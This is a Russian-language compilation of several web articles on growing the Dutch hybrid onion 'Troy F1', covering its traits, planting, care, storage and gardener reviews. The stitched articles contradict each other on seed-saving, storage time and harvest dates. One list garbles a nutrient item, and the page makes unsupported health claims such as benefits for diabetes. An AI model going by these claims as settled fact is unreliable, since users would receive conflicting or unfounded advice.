36 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Лук севок трой описание

Описание сорта лука Трой

Данный сорт лука не так давно пришел к нам из Голландии. Однако несмотря на свою новизну, он уже успел завоевать любовь российских садоводов. Лук Трой отлично подходит не только для выращивания на приусадебных участках, но и для культивации в промышленных масштабах.

И в сегодняшней публикации мы решили подробнее познакомить вас с этим голландским луком. В статье вы отыщите полное описание сорта лука Трой, прочитаете отзывы о нем, а также увидите фото луковиц.

Характеристика сорта

Лук Трой отлично подходит как для осенних, так и для весенних посадок. Луковицы этого сорта имеют золотисто-коричневый окрас. Луковицы крупные, плоско-округлые или округлые, покрыты отличной, плотной чешуей. Средняя масса полностью зрелой луковицы находится в пределах 80-90 грамм.

Шейка средней толщины. Стоит отметить, что чем тоньше и замкнутее шейка, тем дольше хранится урожай.

Вкус у луковиц хороший. Как и у ряда озимых сортов он классифицируется как полуострый (4.7 баллов остроты из 10 возможных). Содержание сухих веществ в мякоти находится в пределах 14.5%.

Также стоит отметить, что этот сорт богат такими элементами как:

  1. Кальций.
  2. Железо.
  3. Калий.
  4. Мякоть.
  5. Ряд витаминов группы В.

Листья у Троя узкого типа, трубчатые, интенсивно зеленого окраса. Длина листьев находится в районе 20-45 см. Листьям характерно наличие воскового напыления.

Трой не склонен к стрелкованию. Также, он обладает достаточно сильным иммунитетом. Он редко подвергается заражению распространенными луковыми заболеваниями.

Урожайность достойная. При соблюдении всех агротехнических правил с 1 м2 можно получить до 5 кг отменного урожая.

Положительные и отрицательные качества лука Трой

Несмотря на то, что этот сорт является новинкой, садоводы все же успели выделить его основные плюсы и минусы. Первым делом поговорим о положительных качествах этого сорта. К плюсам Троя относят:

  1. Ранний период созревания.
  2. Высокие показатели урожайности.
  3. Устойчивость к стрелкованию.
  4. Хороший иммунитет.
  5. Высокие показатели морозостойкости.
  6. Универсальное назначение луковиц.
  7. Длительный период сохранности урожая.
  8. Хорошая плотность луковиц, благодаря чему их можно собирать механическим способом.

Вместе с тем, не стоит забывать и про недостатки. К главным минусам лука Троя относят:

  1. Высокая стоимость посадочного материала.
  2. Невозможность выращивания севка из собственных семян.
  3. Не подходит для выращивания с целью получения зелени.

Таким образом лук Трой является отличным озимым сортом, который в основном имеет недостатки связанные с его стоимостью.

Правильная посадка

Садоводы рекомендуют выращивать Трой под зиму, хотя его можно высаживать и ранней весной. Однако перед непосредственной посадкой нужно провести ряд подготовительных работ.

Выбор участка для лука

Будущий участок для Троя выбирают исходя из нескольких критериев:

  1. Грунтовые воды на участке не должны залегать близко к поверхности грунта.
  2. Участок должен находиться на солнечном месте.
  3. Он должен быть защищен от северных ветров.

Также, нужно соблюдать севооборот. Важно учитывать те культуры, которые культивировались на этом участке в ближайшие 4 года. Например, абсолютно не подходят те участки, на которых менее 4-х лет назад выращивались следующие культуры:

  1. Морковь.
  2. Редька.
  3. Сельдерей.

Подходят те участки, на которых даже недавно выращивались следующие культуры:

  1. Огурцы.
  2. Картофель.
  3. Томат.
  4. Горох.
  5. Фасоль.
  6. Капуста.

Подготовка участка

Когда участок подобран, приступают к его подготовке. Подготавливать участок начинают заранее. Разрешено и за 2 недели до посадки, но опытные садоводы все же рекомендуют приступать к подготовке не ранее чем за 60 дней.

Предварительная подготовка участка заключается в:

  1. Полной очистке участка. Это и остатки предыдущих сельскохозяйственных культур и удаление всей сорной травы.
  2. Нормализации кислотности грунта. Трою необходима почва нейтральной кислотности. Поэтому если она повышена, то нужно добавить карбонаты, такие как доломитовая мука и т. д.
  3. Рыхлении грунта. Его перекапывают на глубину до 30 см.
  4. Грунт нужно удобрить органикой. Используют перегной в расчете 6 кг на 1м2.
  5. Если на участке часто застаивается вода, тогда грунт разбавляют песком.

Подготовка севка

Естественно, посадочный материал не должен иметь каких-либо видимых дефектов в виде наростов, пятен гнили, трещин и все в этом роде. Также, от луковиц не должно исходить запаха гнили.

Долго замачивать севок перед посадкой под зиму не рекомендуется. Вместо этого опытные садоводы советуют обработать посадочный материал в солевом растворе (готовится из 1 столовой ложки соли на 1 литр воды). Такая обработка усилит иммунитет луковиц. Также, вместо соли можно использовать слабый марганцовый раствор.

Особенности посадки

Глубина посадочных борозд зависит от размеров севка. При более крупных луковицах лунки вырывают приблизительно 8 см в глубину, при мелких — порядка 5 см.

Междурядья рекомендуется делать не менее 20 см, а расстояние между луковицами в ряду — около 10 см.

Сам же алгоритм посадки выглядит следующим образом:

  1. Вырывают посадочные лунки или борозды, это уже на усмотрение садовода.
  2. На дно укладывают горсть древесной золы.
  3. Размещают посадочный материал в ямке.
  4. Присыпают его грунтом. Грунт слегка нужно уплотнить.
  5. Мульчируют грядки.

Все, процедура завершена. Далее нужно ухаживать за посадками.

Уход за луком Трой

Урожай и качество лука Троя напрямую зависит от того, какой уход будет за этой культурой. При его отсутствии ожидать на хороший урожай не стоит.

Что же касается ухода, то при выращивании Троя необходимо соблюдать ряд следующих правил:

  1. Нельзя допускать пересыхания грунта. Полив — это важная процедура во время ухода за Троем. Но при этом нельзя переусердствовать, так как слишком обильные поливы станут причиной гниения луковиц.
  2. Грунт нужно рыхлить. Это важная агропроцедура. После поливов на поверхности формируется плотная корочка. Она ухудшает доступ кислорода к луковице, из-за чего та хуже развивается. Также, в более рыхлом грунте луковицы набирают большую массу и объем.
  3. Опытные садоводы рекомендуют проводить мульчирование, так как оно снизит трудозатраты и значительно упростит уход за луком. При мульчировании почва будет удерживать влагу, культуру реже будут инвазировать различные паразиты.
  4. В обязательной мере нужно удалять сорную траву. Сорняки оказывают угнетающее воздействие на культуру.

Весенний уход

Весенний уход за Троем подразумевает следующие процедуры:

  1. Когда снег сойдет, можно сразу приступать к очистке посадок от мульчи. Это позволит грунту быстрее прогреться под весенними лучами солнца.
  2. Ранней весной также рекомендуется вносить подкормки. Первый раз лук удобряют азотосодержащими удобрениями. Они стимулируют рост луковиц. Идеальный вариант — использование раствора из куриного помета (раствор готовится из 1 части удобрения и 15 частей воды). Второй раз лук удобряют после появления зеленых перышек.

Отзывы садоводов

Наталья Владимировна, г. Краснодар, 45 лет.

В прошлом году впервые познакомилась с этим сортом. Был новинкой, ранее не сталкивались. Севок покупала осенью, сказали новинка, на западе хвалят, а вот у нас пока еще неизвестно как себя показывает. Но продавец сказала, что должен быть хорошим. Я же любитель экспериментов, решила попробовать новинку. Что могу сказать, сорт мне понравился. Решила его оставить как основной под зимнюю посадку, естественно, если смогу найти на рынке. Ни одна луковица не выдала цветочной стрелки, в отличие от моего шалота. В основном луковицы средних размеров, мелких почти не было. Вкус хороший, присутствует легкая горчинка.

Дмитрий Иванович, г. Тюмень, 51 год.

Трой выращиваю уже как пять лет. Сорт нравится. Урожай стабильный, луковицы хранятся достаточно долго. Луковицы вкусные, сочные, среднего размера, приблизительно по 90 грамм.

Ольга Викторовна, г. Киев, 41 год.

Читаю положительные отзывы об этом луке и полностью согласна с садоводами. Один из лучших сортов под зиму. Да, может уступать некоторым сортам по массе луковиц, но на вкус отменный и ни разу не стрелковался, сколько я его выращиваю. Плюс стоит отметить, что Трой — раннеспелый. Чешуя плотная, луковицы хранятся долго, не склонны к гниению. Урожайность хорошая. У меня где-то 4-4.5 кг с 1 м2.

Лук Трой: описание сорта, посадка и уход в открытом грунте

Для озимого выращивания подойдет далеко не каждый сорт. Именно поэтому, стоит обратить внимание на нового и очень достойного кандидата. Сорт Трой относится к устойчивым потомствам гибридов f1, прекрасно себя зарекомендовал в «полевых» условиях, а также отличается выдающимися характеристиками и вкусовыми качествами репок. В нашей статье рассмотрен лук Трой, приведено описание сорта, а также правила посадки и ухода.

Описание сорта

Новый Troy F1 появился не так давно, но уже успел снискать себе славу неприхотливого сорта, стойкого к болезням и атакам вредителей, дающего высокий урожай. Получен он в результате работы голландских селекционеров и представляет собой материал первого поколения f1. Внешне луковки этого сорта не отличаются от традиционных, но стоят заметно дороже. Это является неизбежным побочным эффектом множества достоинств этого вида, о которых речь пойдет далее.

Основные характеристики сорта:

  • Урожайность луковиц в среднем на 50% больше, нежели у обычных сортов. Продуктивность достигает 5 кг/м²
  • Вкус у него умеренно острый, назначение плодов — универсальное. Овощ прекрасно подходит для употребления в свежем виде, консервации и салатов.
  • Луковки могут хорошо храниться даже длительный период (до четырех месяцев без потери вкусовых качеств).
  • Репки имеют округлую форму, средний размер и белую мякоть.
  • Сорт относится к скороспелым, озимый урожай можно собирать уже в июле – начале августа.

Сорт лука Трой, посадка под зиму которого описана далее, содержит много полезных веществ, в частности, повышенное содержание железа и кальция, а также витаминов группы В. Растение проявляет стойкость к характерным вредителям и болезням, поэтому выращивание не представит сложность.

Подготовка и посадка

Перед посадкой на зиму лука Трой, обязательно стоит подготовить почву. Для этого ее перекапывают, очищают от сорняков и растительных остатков, а затем удобряют органикой и минеральными комплексами. Количество удобрений следует рассчитывать, исходя из потребностей почвы и предпочтений луковых культур. Примерно за два дня до высадки, почву хорошо увлажняют и накрывают пленкой для лучшего эффекта сохранения влаги.

Важное значение уделяется и подготовке посадочного материала. Если не планируется выращивание растений на перо, необходимо сделать сразу закалку, которая уменьшит вероятность стрелкования. Для этого севок следует немного отшелушить и замочить на полчаса в горячей воде. После этого кинуть его в холодную. Вместо обычной воды можно использовать стимулирующие и дезинфицирующие растворы, но обычно этот сорт в дополнительных методах увеличения иммунитета не нуждается. После таких «купаний», необходимо разложить луковицы севка для подсыхания.

Важные нюансы посадки:

  • Приобретение селекционированного севка не всегда возможно, поэтому лучше вырастить посадочный материал из семян чернушки. Для этого семена лука высаживаются ранней весной, а уже в конце сезона в вашем распоряжении будут крепкие луковки разного размера.
  • При хранении посевного материала следует подготовить сухое и прохладное место, а при озимом методе выращивания, полученный севок можно после просыхания и подготовки использовать. Таким образом следующим летом можно собрать хороший урожай лука этого сорта, а также запастись семенами для последующего выращивания.
  • Сажают лук Трой на хорошо освещенных местах без застоя влаги и каменистых участках. Лук любит рыхлые песчаные и суглинистые почвы с хорошим дренажом. Подойдут высокие грядки, а также специальные парники, в которых можно выращивать луковки и другие культуры в зимнее время.
  • Время посадки определяется индивидуально. Оптимально, когда несколько дней держится температура не ниже пяти градусов тепла. Приходится этот период на конец сентября и до начала ноября, в зависимости от региона проживания.
  • Лучший способ посадки — сделать глубокие траншеи (не менее 15 см), на дно подсыпать песка, смешанного с древесной золой. Севок располагать на расстоянии не менее 10 – 12 сантиметров друг от друга, а высота углубления должна быть не менее одного «роста» луковички.
  • После посадки не стоит поливать грядки, чтобы репки не загнили. Поверхность почвы замульчировать, используя лапник, сухую солому, ветки деревьев и ботву сельскохозяйственных культур. При невозможности такого укрытия, можно использовать агроволокно и даже обычные опилки. Мульчирование спасет посадки от перемерзания, а также даст дополнительную подкормку. После появления снега, можно регулярно подсыпать его на грядки, обеспечивая плотный слой защиты.
  • До начала весны посадки не поливают, не удобряют и не рыхлят. Все это необходимо будет начинать с появлением стабильного тепла. Первая подкормка проводится примерно в середине апреля – начале мая органическими удобрениями. В конце июня также можно использовать минералы или перепревший навоз, но не позже, чем за месяц до уборки урожая.
  • Прополка от сорняков и регулярные рыхления помогут ускорить рост репок. Полив осуществляется по мере надобности теплой отстоянной водой.
  • Сбор урожая проводится в конце июля, после того, как ботва пожелтеет и поляжет. Хранение лука этого сорта не отличается от привычных способов. Можно заплести «косички», подвесить репки в сетках, либо просто разложить на сухой поверхности. При надлежащих условиях луковки отлично сохраняются свежими вплоть до нового года.

Посаженные под зиму луковки сорта Троя отличаются стабильно высоким урожаем и отличными вкусовыми характеристиками. Они стойкие к большинству характерных болезней и вредителей, а также демонстрируют чудеса урожайности. Описание сорта, правила посадки и ухода за грядками луковых насаждений — вся необходимая информация в нашей статье.

Выращивание озимого репчатого лука Трой

Гибридные сорта стоят дороже, но пользуются популярностью благодаря улучшенным качествам, повышенной урожайности, устойчивости к неблагоприятным факторам. Озимый лук Трой можно вырастить из покупного севка, посадив его осенью или ранней весной. Эта разновидность неприхотлива в уходе, соблюдение основных правил агротехники обеспечит получение хорошего урожая.

Происхождение и описание сорта

Репчатый лук был известен за несколько тысячелетий до нашей эры. Родиной культуры считается Юго-Западная Азия. Постепенно овощ завезли в другие страны. Из окультуренных видов селекционеры создавали гибриды, обладающие улучшенными характеристиками. Сорт Трой F1 выведен голландскими учеными. В Госреестр РФ данная разновидность внесена по 3 (Центральному) региону доступа в 2008 году. Рекомендована для выращивания товарных головок из севка в двухлетней культуре.

Описание лука Трой:

  • товарная репка округлая или немного плоская массой 80-90 г;
  • окрас луковиц гибрида F1 желтый, золотистый или коричневатый;
  • вкус мякоти умеренно острый;
  • репки одно- или двухзачатковые;
  • шейка средняя;
  • листья трубчатые, зеленого окраса, с восковым налетом;
  • высота надземной части 20-45 см.

Разновидность является гибридом, поэтому заявленное описание сорта относится только к урожаю первого поколения.

Сбор семенного материала практиковать не рекомендуется, поскольку выращенный лук характерные свойства не сохранит. Покупать севок следует только в специализированных магазинах.

Основные характеристики и особенности сорта:

  • раннеспелый, созревает за 60-75 суток;
  • урожайность 323 ц/га;
  • отличная товарность;
  • благодаря плотным чешуйкам подходит для механизированного сбора урожая;
  • срок хранения 3,5-4 месяца;
  • перед уборкой вызревает на 75 %, после дозревания – на 100 %;
  • устойчив к стрелкованию и вымерзанию;
  • севок следует сажать осенью или ранней весной;
  • для получения чернушки не используется.

Достоинства и недостатки сорта

Основными отрицательными четами озимых разновидностей является немного меньшие урожайность и длительность хранения по сравнению с яровыми. Недостатки гибридов – высокая цена, невозможно вырастить собственный посевной материал, необходимо каждый год покупать новый севок для выращивания. Лук сорта Трой предназначен только для получения товарной репки, на зелень не высаживается.

  • повышенная устойчивость к стрелкованию, заболеваниям и вымерзанию;
  • товарная урожайность на 50 ц/га выше стандарта Азелрос;
  • сажать можно осенью и весной;
  • высокие товарность, транспортабельность, достаточно длительное хранение;
  • хорошие вкусовые качества.

Особенности посадки под зиму

Грядку под лук Трой нужно начинать готовить сразу после уборки предыдущей культуры. Расположение выбирать солнечное, защищенное от сильных ветров и подтапливания. Важно соблюдать севооборот, на одно место нельзя высаживать лук чаще 1 раза за 3-4 года. Предшественниками могут быть огурцы, капуста, кабачки, горох, картофель, свекла, редис, болгарский перец. Нежелательные – морковь, зелень, пряности, томаты, репа.

При посадке лука-севка Трой осенью не надо добавлять большое количество азотсодержащих добавок, провоцирующих преждевременное прорастание и наращивание зеленой массы. Для повышения устойчивости к стрелкованию посадочный материал допустимо замочить на 20 минут в воде +40-50 °C, обеззаразить раствором марганцовки, просушить до полного высыхания. Подобную обработку желательно проводить только весной, перед посадкой под зиму рекомендуется использовать сухие луковички. Подрезать шейку не требуется.

Преимущества осенней высадки

Данный метод может практиковаться во многих регионах страны. Главным условием его успешности является правильный выбор сорта культуры.

При выращивании озимого лука Трой, посаженного осенью, огородник получает следующие преимущества:

  • сокращение весенних работ;
  • использование мелкого севка (до 1 см), который до весны может высохнуть, стать непригодным для посадки;
  • ранний сбор урожая;
  • облегчение ухода, после снежной зимы полив понадобится только в начале мая;
  • сорняки меньше растут, луковой мухи пока нет;
  • репка вырастает более крупной.

Сроки посадки

Рекомендуется сажать лук Трой под зиму в конце октября – начале ноября. Температура воздуха должна установиться на уровне +5 °C, около месяца должно остаться до сильных морозов, а понижение до -0 °C возможно через 1-2 недели.

Важно проводить посадочные работы вовремя. Преждевременная посадка спровоцирует появление всходов, что приведет к гибели лука. При запоздалой севок не успеет укорениться, может сгнить.

При высаживании весной следует дождаться прогревания почвы до +5 °C.

Подготовка грядки

Лук Трой хорошо растет на питательном дренированном почвогрунте. При предварительной подготовке обязательно зачистить участок от растительных остатков и перекопать с внесением необходимых компонентов. Кислый грунт известковать за несколько месяцев до посадки. При необходимости использовать доломитовую муку или древесную золу. Последняя также подходит в качестве удобрения.

Увеличить питательность можно с помощью калийной соли, перепревшего перегноя, суперфосфата. Запрещено вносить свежий навоз и много азотсодержащих компонентов. Рекомендуется делать высокие грядки, поднимая их на 15-25 см, но подготовку проводить заранее, чтобы земля успела осесть и не оголила посаженный севок. В тяжелую почву допускается для улучшения структуры вносить торф, песок, опилки. За несколько дней грунт обильно полить. Горячая вода или слабый раствор марганцовки окажут обеззараживающее действие.

Технология высадки

Бороздки и лунки желательно готовить заранее, чтобы не тратить на это время холодной осенью. Междурядья оставлять 15-20 см, между растениями 10-12 см. Заглублять на 1-2 см, чтобы весной всходам было легко пробиться сквозь плотный слой земли. Слишком близко к поверхности размещать не рекомендуется, поскольку в случае холодной зимы луковички могут вымерзнуть.

При высадке севка лука Трой в углубления допускается вносить небольшое количество древесной золы. Сверху засыпать рыхлой теплой почвой. Поливать нельзя, чтобы не спровоцировать преждевременный рост.

Подготовка к зимовке

После посадки лука Трой поверхность необходимо хорошо замульчировать. Это поможет севку благополучно перезимовать даже в случае морозной и бесснежной зимы. Землю на 7-10 см засыпать соломой, опилками, сухой травой, листьями, шелухой семечек или створками бобовых культур. Чтобы укрытие не сдуло ветром и не смыло дождями, сверху положить агроволокно и придавить веточками или уложить лапник. Пленку использовать нежелательно. Зимой по возможности накидывать на грядки снег. После весеннего оттаивания почвы укрытие снять.

Озимый лук Трой рекомендуется сажать осенью или ранней весной. Разновидность отличается урожайностью, морозовыносливостью, устойчивостью к стрелкованию и заболеваниям. Важно вовремя посадить севок, чтобы успел укорениться, но не взошел. Соблюдение правил агротехники поможет получить хороший урожай.

Особенности озимого лука Трой: посадка, уход, описание

Каждый овощевод мечтает о богатом урожае. Оправдано и желание собрать овощи с грядки как можно раньше. А если овощная культура неприхотлива в плане ухода, то она – настоящий подарок для дачника. Трой, как один из озимых сортов лука, позволяет без особых усилий получить ранний урожай. Этот сорт – новинка, которая обладает замечательными во всех отношениях характеристиками. Какими? Разберемся вместе.

Описание

Лук-севок Трой – овощ, который идеально подходит для посадки в зиму. Этот раннеспелый сорт имеет немного уплощенную, либо круглую луковицу. Желтая чешуя лука плотная и сухая.

  • Средний по размеру лук не склонен к стрелкованию. Считается одно- или двухзачатковым.
  • Количество урожая озимого Троя составляет более 5 кг/кв.м.
  • По вкусовым характеристикам считается полуострым, не очень резким.
  • Хранится до 4 месяцев.
  • Содержит в составе большое количество таких элементов, как Fe, Ca, а также витамины группы B.
  • Не подвержен многим заболеваниям, влияющим на качество урожая озимого лука.

Севок

Прежде, чем посадить севок Трой в зиму, его нужно либо купить, либо правильно вырастить. Грамотно выращенный севок при соблюдении условий ухода даст хороший урожай подзимнего лука. Семена лука – чернушку необходимо сажать ранней весной. Осенью этого же года можно садить севок в зиму, а урожай лука собирать уже следующим летом.

  • Почва для посадки чернушки должна быть немного прогретой, снег с которой едва сошел.
  • Высеивать чернушку нужно густо.
  • Глубина полосы для посадки должна составлять 1-2 см, ширина полосы – до 6 см.
  • Расстояние между полосами должно быть удобным для прополки.
  • Засыпанную землей чернушку озимого Троя необходимо слегка прикатать.
  • Для защиты почвы и улучшения ее свойств желательно покрыть ее перегноем или компостом.
  • Первую поливку осуществить при посадке. Повторить полив сразу после всхода севка при условии сухих погодных условий.
  • Когда листья пожелтели и упали, севок лука Трой пора выкапывать.
  • Выкопанный севок оставить на грядке для подсыхания.
  • Просушенные подзимние семена-луковички Троя отшелушить от листьев.
  • Луковицы Троя для посева в зиму должны быть мелкими – менее 1 см в диаметре. Чем меньше семена подзимнего севка, тем меньше вероятность стрелкования.

Высадка в зиму

Идеальная почва для высадки озимого Троя:

  • суглинок с обилием органики;
  • дренирующие грунты;
  • иловые наносы неподалеку от рек.

Если почва на огороде кислая, добавьте к ней извести. Трой – светолюбивая культура. Почва для посадки этого сорта озимого лука должна быть слегка осевшей и плотной.

Сажать лук этого сорта необходимо за месяц до постоянных заморозков. Здесь важно следить за сводками погоды. Другой вариант – ориентироваться на погодные условия. 5 градусов выше ноля на протяжении нескольких дней – сигнал к посадке многих сортов озимого лука, в том числе и Троя. Также не стоит пренебрегать рекомендациями лунного календаря.

Особые правила

Лук-репка относится к тем овощам, которые нельзя сажать на одну и ту же грядку более двух лет подряд. Посадку в зиму сорта Трой на прежнее место можно повторить только через 4 или 5 лет. Предшественники – лучшие культуры, после которых стоит садить Трой:

  • зерновые;
  • бобы;
  • болгарский перец;
  • помидоры и огурцы;
  • капуста;
  • картофель.

Лучший способ посадки

Для выращивания такого сорта, как озимый Трой, большим успехом пользуется китайский метод на гребнях. Он значительно повышает урожайность луковиц, так как репка вырастает крупной. К тому же этот метод позволяет повысить сопротивляемость растения гнили – это позволяет снизить затраты на уход. Севок при этом способе высаживают в гребни высотой в 15 см. Между гребнями промежуток составляет 30 см. Севок при этом высаживают на глубину 4 см, а расстояние между луковицами – не менее 3 см. Засыпанный землей севок перед началом заморозков нужно покрыть лапником, срезанной ботвой растений, опилками или сухой листвой. Такой уход за растением спасет его от заморозков. Поливать не нужно.

В зимнее время луку также нужен уход. Желательно задерживать снег на грядках с озимым луком, чтобы защитить будущий урожай от суровых морозов.

Когда сойдет снег

  • После схода снега ветки и листья с грядки озимого Троя нужно убрать. Так земля быстрее прогреется.
  • Разрыхлите почву после зимы. Уход за грунтом обогащает растение кислородом, дает возможность для питания корней.
  • После обильных дождей сделайте подкормку лука-репки в виде разведенного в воде куриного помета.
  • Для защиты от луковой мухи рядом с грядкой рекомендуется посеять календулу или бархатцы. От этого вредителя также защищает уход в виде частого рыхления почвы.
  • Полоть озимый лук нужно очень аккуратно, стараясь не повредить луковицы.

Сбор урожая

Здесь нет четких границ. Собирать посаженный в зиму Трой можно, когда все его листья полегли на землю. При этом верхняя чешуя должна иметь золотисто-желтый или светло-коричневый цвет. Собранный урожай важно хорошо просушить. Когда листья и корни высохнут, можно убирать лук на длительное хранение в прохладное место. Поврежденные луковицы разумнее употребить в пищу как можно раньше – их срок хранения исчисляется несколькими днями.

Озимый Трой не выделяется среди прочих луковых культур особыми условиями посадки или ухода. Главные требования – солнечное место высадки и питательная почва. Это станет хорошим началом в выращивании непривередливого и урожайного сорта.

Раннеспелый озимый гибрид лука Трой с умеренно-острым вкусом

Гибрид лука Трой не так давно появился на рынке, но уже полюбился овощеводам. Он быстро созревает, неприхотлив в уходе, высокоурожаен, обладает крепким иммунитетом и высокой лежкостью. Вызреваемость после дозаривания достигает 100%. Подробнее о его достоинствах и правилах выращивания поговорим далее.

Описание сорта и фото

Благодаря полуострому вкусу лук Трой универсален в использовании: его употребляют в свежем виде, добавляют в салаты, первые блюда, маринады для мяса и рыбы, консервацию.

Этот озимый гетерозисный гибрид был получен в результате селекционных работ голландских ученых компании «BEJO ZADEN». В Госреестр России Трой включили в 2008 году.

Состав и полезные свойства

Лук содержит:

  • витамины C, E, PP и группы B;
  • биофлавоноид кверцетин;
  • фитонциды;
  • пребиотик инулин;
  • фруктозу и глюкозу;
  • пектин;
  • макро– и микроэлементы: кальций, магний, железо, фосфор и другие;
  • эфирные масла;
  • пищевые волокна;
  • органические кислоты.

Овощ полезен при сахарном диабете, очищает кровь и нормализует пищеварение, активизирует обмен веществ, улучшает кроветворение. Луковый сок используют в качестве натурального антибиотика: он обладает общетонизирующими, укрепляющими и антибактерицидными свойствами.

Срок созревания и урожайность

Это гибрид раннего срока созревания: урожай собирают спустя 75–80 дней после посадки. Товарная урожайность Троя — 323 ц/га.

Устойчивость к болезням

Трой устойчив к большинству характерных для лука болезней и вредителей:

  • ложной мучнистой росе;
  • серой гнили;
  • бактериозу;
  • луковичной мозаике;
  • луковым мухе и моли.

Характеристики

Растение достигает 45 см в высоту, листья трубчатые, темно-зеленые, покрыты тонким слоем воскового налета.

Луковицы широко обратнояйцевидной формы с шейкой средней толщины. Бывают одно– и двухзачатковыми. Покрыты шелухой светло-коричневого цвета, весят в среднем 80–90 г.

Мякоть зеленовато-белая, сочная, вкус полуострый.

Для каких регионов подходит

Гибрид включен в Госреестр с допуском к выращиванию в Центральном регионе. При этом он хорошо адаптируется к разным климатическим условиям и обладает морозоустойчивостью, поэтому успешно культивируется практически по всей России.

Главные преимущества и недостатки

Достоинства лука Трой:

  • раннее созревание;
  • высокая урожайность;
  • устойчивость к стрелкованию, морозам, болезням и вредителям;
  • универсальное применение;
  • длительный срок хранения;
  • возможность механической уборки урожая.

Недостатки гибрида:

  • высокая стоимость севка;
  • невозможность выращивания из собственных семян;
  • культивация только ради луковиц: для получения зелени не высаживается.

Отличия от других

Сравнительная таблица разных гибридов:

Гибрид Срок созревания Урожайность, ц/га Вкус Форма луковицы Вес луковицы, г
Трой F1 75–80 дней 323 Полуострый Широко обратнояйцевидная 80–90
Альбион F1 90–120 дней 167–220 Полуострый Округлая 70–100
Спирит F1 120–125 дней 78–202 Полуострый Округло-плоская 47–100
Кэнди F1 85–90 дней 178–355 Сладкий Широко обратнояйцевидная 60–80

Посадка и выращивание

Для получения качественного урожая важно своевременно и правильно посадить севок в грунт. Материал покупают или выращивают самостоятельно из чернушки — семян, посаженных в начале весны.

Подготовка к посадке

Чтобы получить севок, семена раскладывают на влажной ткани и помещают в герметичный контейнер для проращивания в течение 4-5 дней. Это ускорит появление всходов.

Для минимизации стрелкования севок закаливают. Для этого его слегка отшелушивают, на 30 минут замачивают в горячей воде, затем окунают в холодную. После луковицы сушат на бумажном полотенце.

Справка. Обычно севок замачивают в дезинфицирующем и стимулирующем рост растворе, но Трой — гибрид, поэтому в этом не нуждается.

Почву заранее перекапывают, очищают от сорной травы и остатков растений, вносят органические и комплексные минеральные удобрения. За 2-3 дня до посадки грунт обильно поливают и накрывают пленкой, чтобы влага дольше сохранялась.

Требования к грунту

Лук Трой не слишком требователен к почвенному составу, но предпочитает легкий питательный грунт с хорошими влаго– и воздухопроницаемостью, нейтральной кислотностью.

В кислую почву за несколько месяцев до посадки вносят известь, доломитовую муку, мел или древесную золу, которая служит удобрением.

Сроки, схема и правила посадки

Посев для получения севка проводят в начале мая по схеме:

  1. Поперек подготовленных на расстоянии 10–15 см друг от друга грядок намечают неглубокие бороздки.
  2. Помещают в них семена, заглубляя на 1 см и выдерживая расстояние между ними в 1–1,5 см с последующим прореживанием до 2-3 см.
  3. Присыпают все землей.

Лук-севок Трой в открытый грунт высаживают весной (в Центральном регионе — в начале мая) или под зиму, примерно за три недели до наступления заморозков, когда среднесуточная температура воздуха опустится до +5°C. Обычно это происходит в конце сентября – начале ноября, более точные сроки зависят от региона выращивания.

Схема посадки:

  1. Граблями взрыхляют заранее подготовленную землю на участке.
  2. Формируют грядки с высотой гребня в 15–20 см на расстоянии 60–70 см друг от друга.
  3. Делают в них посадочные борозды глубиной 4-5 см, на дно которых насыпают песок, смешанный с древесной золой.
  4. Помещают в борозды севок, заглубляя минимум на весь «рост» луковицы, на расстоянии 10–12 см друг от друга.
  5. Присыпают все перегноем и землей, слегка уплотнив.

При посадке под зиму для защиты от морозов и дополнительной подкормки почву мульчируют лапником, сухой соломой, опилками или укрывают агроволокном. Мульчу снимают в начале весны, после схода снега.

Особенности выращивания

Сажают лук на хорошо освещенном и проветриваемом участке, избегая низин, где из-за скопления талой или дождевой воды урожай будет загнивать.

Для Троя не подходит одно и то же место в течение двух лет подряд: такой участок используют не раньше, чем через 3-4 года.

Не высаживают гибрид после моркови, зелени, пряностей, репы, помидоров. Лучшие предшественники: огурцы, капуста, болгарский перец, кабачки, картофель, свекла, горох, редис.

Важно правильно выбрать время посева: при преждевременной высадке в открытый грунт лук рано начнет расти и погибнет от мороза, при запоздалой — не успеет укорениться.

Нюансы ухода

Это неприхотливый гибрид, но он нуждается в минимальном уходе, заключающемся в грамотном поливе, внесении удобрений, рыхлении грунта и прореживании всходов.

Режим полива

Орошают растения регулярно, но умеренно, не допуская чрезмерного увлажнения и заболачивания грунта: это провоцирует гниение луковиц. При поливе ориентируются на состояние почвы: она должна быть увлажнена на 3–5 см в глубину.

Справка. Воду комнатной температуры льют в междурядья, не попадая на ростки.

За несколько недель до сбора урожая орошение прекращают, чтобы луковицы окончательно сформировались и подсохли.

Рыхление и прополка

Рыхлят грунт в междурядьях через день после полива: это обогащает почву кислородом и улучшает циркуляцию влаги.

Пропалывают посадки раз в 10–14 дней. Вокруг луковиц сорняки удаляют вручную, аккуратно, стараясь не повредить поверхность овощей, а в междурядьях используют культиватор или другие инструменты.

Подкормка

Удобряют культуру несколько раз за сезон:

  • в конце апреля – начале мая — органическими составами (перепревшим навозом, компостом);
  • в конце июня — жидкими минеральными средствами, содержащими натрий и фосфор.

Землю в междурядьях поливают настоем лекарственных трав: крапивы, ромашки, одуванчика.

Борьба с болезнями и вредителями

Благодаря хорошему иммунитету этот гибрид редко поражается болезнями и насекомыми. Если такое происходит, то только из-за неправильного ухода или несоблюдения правил посадки.

При наличии признаков заболеваний культуру обрабатывают фунгицидами, от вредителей используют инсектициды.

Сбор и хранение урожая

О готовности урожая к уборке судят по пожелтению и полеганию листьев.

Как и когда собирать

Овощи выкапывают в конце июня – начале июля, в ясный солнечный день. На больших площадях прибегают к механической уборке, на небольших участках лук собирают вручную, выдергивая из земли, предварительно подкопав лопатой.

Особенности хранения и лежкость гибрида

Когда лук собран, его осматривают и тщательно сортируют, выбрасывают или откладывают для скорейшего употребления поврежденные экземпляры. Урожай сушат на солнце или под навесом в течение двух недель.

Справка. Когда хвостик луковицы станет совершенно сухим, овощи отправляют на хранение.

Держат Трой в темном помещении при температуре 0…-3°C и влажности воздуха в пределах 75–90%. Лук подвешивают в сетках, заплетя «косички», или раскладывают на сухой поверхности. При соблюдении всех условий урожай не теряет своих товарных и вкусовых качеств 4-5 месяцев.

Трудности при выращивании

При культивации лука Трой фермеры сталкиваются с некоторыми проблемами:

  • загнивание репок при чрезмерном поливе, скоплении талой или дождевой воды;
  • преждевременное прорастание и обильное наращивание зеленой массы при переизбытке азотсодержащих подкормок;
  • прекращение образования листьев, раннее формирование луковиц или остановка роста при нарушении правил агротехники и отсутствии должных условий выращивания.

